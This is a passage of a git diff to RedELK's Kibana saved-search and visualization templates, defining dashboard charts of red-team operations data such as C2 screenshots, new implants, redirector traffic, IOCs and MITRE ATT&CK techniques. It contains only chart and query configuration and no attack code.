"{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2193], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152855820, 2196], "type": "search", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson index 5eb99f7c..1942ef49 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_visualization.ndjson @@ -1,47 +1,47 @@ -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 99], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 101], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 102], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 105], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 107], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.3", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 109], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.3", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 111], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Techniques\"}"}, "coreMigrationVersion": "7.16.3", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 113], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.3", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 115], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 117], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 119], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 121], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": 